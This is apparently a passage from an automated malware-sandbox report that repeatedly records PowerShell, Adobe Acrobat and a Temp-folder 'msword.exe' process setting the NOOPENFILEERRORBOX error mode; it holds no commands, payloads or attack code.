Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
